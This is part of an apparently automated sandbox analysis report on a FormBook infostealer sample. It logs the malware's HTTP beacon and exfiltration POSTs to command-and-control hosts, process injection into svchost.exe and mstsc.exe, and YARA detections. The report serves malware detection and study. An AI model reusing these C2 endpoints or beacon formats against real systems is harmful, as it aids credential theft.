                                              set-cookie: csid=01TjslnEzAznE64PIMyalVxgIat7ENpmb-aCEyH3Z04XYyN9-oL8QVPOQ9DlwK6VwDIan6MJ-tpGnw9sHoFrzBgXmi4TdmH4FMMKS9vk6ifU0jj39ZhRkaBxF7qsGW4p-icpqdZkmDlnVnhMwwBpFWoi_75Adl85Xdr46Z1H9SZSuhKiMt3M2xz7st06cYDo1F10i5VPDbEB2OYEEL1bTHNEopP7FcAuiwh57KrRHYF5Hm7AdmZyzxQkw0la_ZKn9GrGmdW93WgGBDd6FUf3SaGbpiXKkdn80q-aXMRItTVuJuqHQ3BHYOoAM1ptgcB2ENA09_AmlW
                                              Data Raw:
                                              Data Ascii:
                                              Sep 25, 2024 12:48:55.213213921 CEST407INData Raw: 33 71 47 6b 79 74 71 34 5a 68 38 32 44 6e 33 77 4b 5f 77 66 6f 47 6e 73 31 50 7a 69 75 5a 4b 7a 51 58 78 5f 43 31 43 33 5f 61 39 6f 52 4d 6c 6d 41 69 49 57 76 3b 20 44 6f 6d 61 69 6e 3d 2e 73 61 68 69 62 69 6e 64 65 6e 2e 63 6f 6d 3b 20 45 78 70
                                              Data Ascii: 3qGkytq4Zh82Dn3wK_wfoGns1PziuZKzQXx_C1C3_a9oRMlmAiIWv; Domain=.sahibinden.com; Expires=Wed, 25-Sep-2024 11:03:55 GMT; Path=/; Secure; SameSite=Nonevary: User-Agentlocation: https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mf


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              32192.168.2.44976985.153.138.113803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:48:56.884349108 CEST508OUTGET /3lu7/?PR_xXrA=nzWofdhWpyQTuQkDfxpOhZSR2SP28ZN4SJ26h7kwykQFM8AQx5IfrLSrYivs6QFJHI8FrKvcoPkOi5L1XFRCLbCiXi5UAF8H0knLfKrCbz8tBFYRfGccZ0A=&n0=mTk8u4lhzbnhVh HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.mfgarage.net
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Sep 25, 2024 12:48:57.629153967 CEST1236INHTTP/1.1 302 Found
                                              x-content-type-options: nosniff
                                              x-frame-options: SAMEORIGIN
                                              content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                              pragma: no-cache
                                              expires: 0
                                              cache-control: no-cache, no-store, must-revalidate
                                              set-cookie: vid=631; Domain=.sahibinden.com; Expires=Sat, 25-Sep-2027 10:48:57 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: cdid=z68uwdRFgC3zKsDm66f3ea99; Domain=.sahibinden.com; Expires=Sat, 25-Sep-2027 10:48:57 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csss=KEO8PlpMOyatgUbQNFP21NzVW_z10Xy1UB5grVDj0Rdi7YfzPxMWWFZmRxdQ4AbNWFkWluw49lNl5wkjPLgl_Q; Domain=.sahibinden.com; Expires=Wed, 25-Sep-2024 11:18:57 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csls=Xplx8EBuhjI1wU2d_6Y2lJvq-beT1ZSc1K_yET3Ro052oxCT7LLKXWmyQ-APP0bDsCv2u8LuHwFp4YixmTLPLg; Domain=.sahibinden.com; Expires=Thu, 25-Sep-2025 10:48:57 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csid=_MVyJrKgW5yslzSyi4bcy0_xBsCnVNmNTcm50uRVxRS5IwEhamI6issBMIstZv5QOdqoe-U1aHW7hBSUj3Vquwdq_w8Sja6vxuq7YoN48iMFeE1q9SbcVJISovsrH0D3PA6vuurt_ptZwSkjcM7wdysr2TXmvf3FdVUva1HMhnADuFpHxqmBm62q5zcxqPPKxNFG6_Wg6NCLb9Ed4AME8t-GE23q_qgSWbt88OeJpOSI7URdye1CN4YuqQ5-xy0--JmJuvKCWoLOMvkHZdppAtmNYl8V8KUm9kx7dGmA4fEXKaDXbEzbpTSt7XS4rh-yvTNcuH4MpZ
                                              Data Raw:
                                              Data Ascii:
                                              Sep 25, 2024 12:48:57.629215002 CEST564INData Raw: 35 54 62 59 77 71 65 5f 43 45 31 64 79 77 62 66 6e 59 66 63 4b 57 5f 55 47 76 53 51 6a 49 77 67 70 4a 62 4a 37 47 36 52 6c 55 35 6c 48 6e 6c 4c 78 36 48 32 6a 3b 20 44 6f 6d 61 69 6e 3d 2e 73 61 68 69 62 69 6e 64 65 6e 2e 63 6f 6d 3b 20 45 78 70
                                              Data Ascii: 5TbYwqe_CE1dywbfnYfcKW_UGvSQjIwgpJbJ7G6RlU5lHnlLx6H2j; Domain=.sahibinden.com; Expires=Wed, 25-Sep-2024 11:03:57 GMT; Path=/; Secure; SameSite=Nonevary: User-Agentlocation: https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mf


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              33192.168.2.449770104.21.11.31803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:49:02.783584118 CEST769OUTPOST /zznj/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.b5x7vk.agency
                                              Origin: http://www.b5x7vk.agency
                                              Content-Length: 204
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.b5x7vk.agency/zznj/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 50 52 5f 78 58 72 41 3d 61 50 58 36 63 68 65 4c 6d 4f 73 63 6d 6c 34 53 35 37 43 2b 76 61 6b 7a 7a 52 77 7a 54 4f 35 6e 36 49 54 37 69 37 54 54 76 52 69 52 42 69 7a 36 79 5a 4f 44 66 38 45 4f 79 31 37 34 48 72 78 71 50 58 38 66 32 41 50 6e 72 2b 33 4d 4f 54 41 45 4b 71 32 71 55 32 32 45 30 6c 62 72 69 69 34 56 37 61 43 6f 4a 4e 38 47 37 51 71 57 5a 42 6c 58 36 68 53 4c 6a 67 56 34 54 35 58 65 69 57 4f 62 76 30 57 64 59 6f 67 59 36 52 52 62 30 6a 35 61 6b 36 53 75 4d 55 2b 38 53 34 49 64 32 53 6f 57 44 54 62 69 2f 59 6c 4f 4c 53 51 5a 39 2f 33 4c 78 53 72 2f 43 47 74 69 44 61 72 7a 4b 73 73 50 46 51 3d 3d
                                              Data Ascii: PR_xXrA=aPX6cheLmOscml4S57C+vakzzRwzTO5n6IT7i7TTvRiRBiz6yZODf8EOy174HrxqPX8f2APnr+3MOTAEKq2qU22E0lbrii4V7aCoJN8G7QqWZBlX6hSLjgV4T5XeiWObv0WdYogY6RRb0j5ak6SuMU+8S4Id2SoWDTbi/YlOLSQZ9/3LxSr/CGtiDarzKssPFQ==
                                              Sep 25, 2024 12:49:03.768829107 CEST748INHTTP/1.1 404 Not Found
                                              Date: Wed, 25 Sep 2024 10:49:03 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ouS10xTwD8ru2V88eyeaUNzDjjw3jcB4v0AGRb785Rx3vIc0iiXEEnHV%2FqKaKJt1ZsnwxtmHdX7wth%2FnmdEatUUiL%2Bh%2FJ7DHbeCP2TPGIf%2BFlS6sFwN5hHHXVXWCxJIGz6a9eA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c8a7202efc44370-EWR
                                              Content-Encoding: gzip
                                              Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              34192.168.2.449771104.21.11.31803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:49:05.326937914 CEST789OUTPOST /zznj/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.b5x7vk.agency
                                              Origin: http://www.b5x7vk.agency
                                              Content-Length: 224
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.b5x7vk.agency/zznj/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 50 52 5f 78 58 72 41 3d 61 50 58 36 63 68 65 4c 6d 4f 73 63 30 57 51 53 34 63 32 2b 37 4b 6b 77 38 78 77 7a 49 65 35 6a 36 50 62 37 69 36 6e 44 76 44 32 52 42 48 50 36 78 62 6d 44 4d 4d 45 4f 35 56 36 7a 5a 62 77 6b 50 58 77 39 32 46 50 6e 72 2b 54 4d 4f 54 77 45 4a 5a 75 70 55 6d 32 38 2f 46 62 74 73 43 34 56 37 61 43 6f 4a 4e 6f 67 37 51 43 57 59 78 31 58 37 43 4b 49 67 67 56 37 53 35 58 65 6d 57 4f 66 76 30 57 2f 59 6f 52 51 36 55 64 62 30 6a 4a 61 6b 50 75 74 58 6b 2b 36 4e 6f 4a 43 78 78 64 50 61 78 36 65 35 5a 35 75 44 6a 73 31 38 35 6d 52 67 6a 4b 6f 51 47 4a 52 65 64 69 48 48 76 52 47 65 64 79 65 58 68 34 42 50 68 33 36 48 5a 67 69 39 4f 39 78 7a 56 49 3d
                                              Data Ascii: PR_xXrA=aPX6cheLmOsc0WQS4c2+7Kkw8xwzIe5j6Pb7i6nDvD2RBHP6xbmDMMEO5V6zZbwkPXw92FPnr+TMOTwEJZupUm28/FbtsC4V7aCoJNog7QCWYx1X7CKIggV7S5XemWOfv0W/YoRQ6Udb0jJakPutXk+6NoJCxxdPax6e5Z5uDjs185mRgjKoQGJRediHHvRGedyeXh4BPh36HZgi9O9xzVI=
                                              Sep 25, 2024 12:49:06.297909975 CEST746INHTTP/1.1 404 Not Found
                                              Date: Wed, 25 Sep 2024 10:49:06 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7WQdDnWPed89HzWGgTf51KdnXSFEtI3uir7Bx6AExEa38vvlI2f7jwfuMiuX1GLk3qOM%2F%2FpJV5mKz%2FBAdiMSqk39Uo9HMeDDxeIB%2Blsq38rNqa44wCocskp54eRP323TYLhToQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c8a7212b843438b-EWR
                                              Content-Encoding: gzip
                                              Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              35192.168.2.449772104.21.11.31803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:49:08.114710093 CEST10871OUTPOST /zznj/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.b5x7vk.agency
                                              Origin: http://www.b5x7vk.agency
                                              Content-Length: 10304
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.b5x7vk.agency/zznj/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 50 52 5f 78 58 72 41 3d 61 50 58 36 63 68 65 4c 6d 4f 73 63 30 57 51 53 34 63 32 2b 37 4b 6b 77 38 78 77 7a 49 65 35 6a 36 50 62 37 69 36 6e 44 76 44 4f 52 42 31 58 36 79 36 6d 44 50 4d 45 4f 36 56 36 77 5a 62 78 34 50 58 6f 35 32 46 4c 33 72 38 37 4d 49 77 34 45 65 59 75 70 62 6d 32 38 77 6c 62 73 69 69 34 36 37 61 53 73 4a 4e 34 67 37 51 43 57 59 33 35 58 38 52 53 49 76 41 56 34 54 35 58 61 69 57 4f 6e 76 30 50 41 59 73 4d 79 35 67 68 62 7a 44 5a 61 33 4a 36 74 62 6b 2b 34 4d 6f 4a 4b 78 78 42 71 61 78 58 76 35 5a 64 49 44 6a 49 31 38 4e 37 6f 6e 41 61 53 4f 47 52 33 43 71 36 34 41 50 78 4c 51 74 47 47 59 52 51 68 61 52 2f 69 50 34 46 41 6e 37 70 4f 73 78 6c 4b 62 2b 57 71 4e 4d 4f 6c 70 65 55 4f 46 4f 77 2b 49 69 74 45 46 68 4f 6d 48 4d 6f 74 2f 67 52 69 51 6c 4a 4e 59 75 52 63 75 74 73 30 52 64 59 4a 53 5a 77 35 53 31 2b 6d 57 6c 46 58 49 7a 41 36 2f 76 2f 59 54 56 6d 43 30 54 67 5a 48 68 58 48 41 63 63 49 55 35 67 51 4c 33 6d 75 63 4f 50 6a 38 30 73 42 6f 68 4c 46 62 6c 66 61 6d 35 69 30 78 4b [TRUNCATED]
                                              Data Ascii: PR_xXrA=aPX6cheLmOsc0WQS4c2+7Kkw8xwzIe5j6Pb7i6nDvDORB1X6y6mDPMEO6V6wZbx4PXo52FL3r87MIw4EeYupbm28wlbsii467aSsJN4g7QCWY35X8RSIvAV4T5XaiWOnv0PAYsMy5ghbzDZa3J6tbk+4MoJKxxBqaxXv5ZdIDjI18N7onAaSOGR3Cq64APxLQtGGYRQhaR/iP4FAn7pOsxlKb+WqNMOlpeUOFOw+IitEFhOmHMot/gRiQlJNYuRcuts0RdYJSZw5S1+mWlFXIzA6/v/YTVmC0TgZHhXHAccIU5gQL3mucOPj80sBohLFblfam5i0xKxxhEOFqCDHlAZNVdzSkE65jB26rs7A2VvjgL4xqMK2IAjC2NoS1f+9MKMRLloxo12nqgf4oc9o5/SE78ABrqkRW+xgoaPjpdzfLOG5FoMZ1MAIEaNI+rOqJJCMO83envsstKyzShOd9LM5LFqgLTlEtTjGn/t6rJlmN00e8DOpLjoimQNYYJNz0UX0bIOHIbYsE8NFDB2kzrULeJpNpDFy5iBWDKC5jE9dyD2jnzg0tUziuybZeXM2HT3TChQr03+LMSN8vgZAA9r/noCI1yc5nn6QE0rSKy8HtJq+JjneEWEGlq4W6D0gDrPp4R1eUFt7b7GZnJKgiMerLW0xeLCAfqMoezhWbEi+wCQ6qCsChglc4MgzMrdiP7HNEhWPGhgjzawOFZGpUlxf+UvK0iavPtTmHJXS84BMzh7EkG/AudeZaijQHYCaxg0/GeAOAIw01c08X+ENiJ2oaxBJ9qs1lmv8otGs93/SVnnKvDrOMfBuz84HDwL4jVhsYgByP1xa98tEfk4AAada26jnYr9xmAfgbomwJZXP9t1ypYlaeFzrM/xUJDcs4Quxu3xYt5aQIXzAoSl3DRD130TC+Ewgvljiyn70dNMroRQWoOAkR9ORQlG1HjV6h5HEHzF5YSFywyeR/jonFZk86IPWi1XQ7Md3c7iYVebn [TRUNCATED]
                                              Sep 25, 2024 12:49:09.088731050 CEST744INHTTP/1.1 404 Not Found
                                              Date: Wed, 25 Sep 2024 10:49:09 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Di8wk5AqH3nA9jjmt6k2vVl9RnR7jhFGrz0ojU7e09kNJ%2BtxUYtIa5ipTpIiYztYEA19NgnQLpOw2wE8JLB58Z5zfQL%2B5vhXHa%2Bad0LpMFY4Lsv8M7LLyYsX5NV5Tl9sAr85cw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c8a72244da2b9c5-EWR
                                              Content-Encoding: gzip
                                              Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              36192.168.2.449773104.21.11.3180
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:49:10.933710098 CEST509OUTGET /zznj/?n0=mTk8u4lhzbnhVh&PR_xXrA=XN/afWzprYUm2zEh/Me8v7IO6BZfJ8ldqsTKqfvYzDGyGH3Qqe2ibLEK4zu3d4hkDWgHsBH7o/PgLSUsZsuwL2SV1lDf+BUf6ZfDIcx/0TWTXhhDzyKZrRs= HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.b5x7vk.agency
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Sep 25, 2024 12:49:11.930526018 CEST1098INHTTP/1.1 404 Not Found
                                              Date: Wed, 25 Sep 2024 10:49:11 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b02zpv%2BTZ0k02sDOFHzZyUuvMqFcsCQ9EePCYzr5Vhd53SM5QjSsLymWlfvnX7C8qeaGAQhvzwffFkaham4A45glhKEdHLAUitxRVxuStlepiJqHDWEB7P5REusFuPVgAtGQsg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c8a7235eb98c461-EWR
                                              Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                              Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:06:46:03
                                              Start date:25/09/2024
                                              Path:C:\Users\user\Desktop\rP0n___87004354.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\rP0n___87004354.exe"
                                              Imagebase:0x770000
                                              File size:1'638'912 bytes
                                              MD5 hash:C20955BF63AC83DCD469613D4B10504A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:1
                                              Start time:06:46:04
                                              Start date:25/09/2024
                                              Path:C:\Windows\SysWOW64\svchost.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\rP0n___87004354.exe"
                                              Imagebase:0x1e0000
                                              File size:46'504 bytes
                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1812489277.0000000002490000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1812489277.0000000002490000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1817351860.0000000003250000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1817351860.0000000003250000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1817399152.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1817399152.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:2
                                              Start time:06:46:07
                                              Start date:25/09/2024
                                              Path:C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe"
                                              Imagebase:0xdb0000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.3547465093.00000000055B0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.3547465093.00000000055B0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:3
                                              Start time:06:46:11
                                              Start date:25/09/2024
                                              Path:C:\Windows\SysWOW64\mstsc.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\mstsc.exe"
                                              Imagebase:0x770000
                                              File size:1'264'640 bytes
                                              MD5 hash:EA4A02BE14C405327EEBA8D9AD2BD42C
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3547541019.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3547541019.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3546547268.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3546547268.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3547479377.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3547479377.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              Reputation:moderate
                                              Has exited:false

                                              General

                                              Target ID:5
                                              Start time:06:46:22
                                              Start date:25/09/2024
                                              Path:C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe"
                                              Imagebase:0xdb0000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3548998319.0000000005260000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
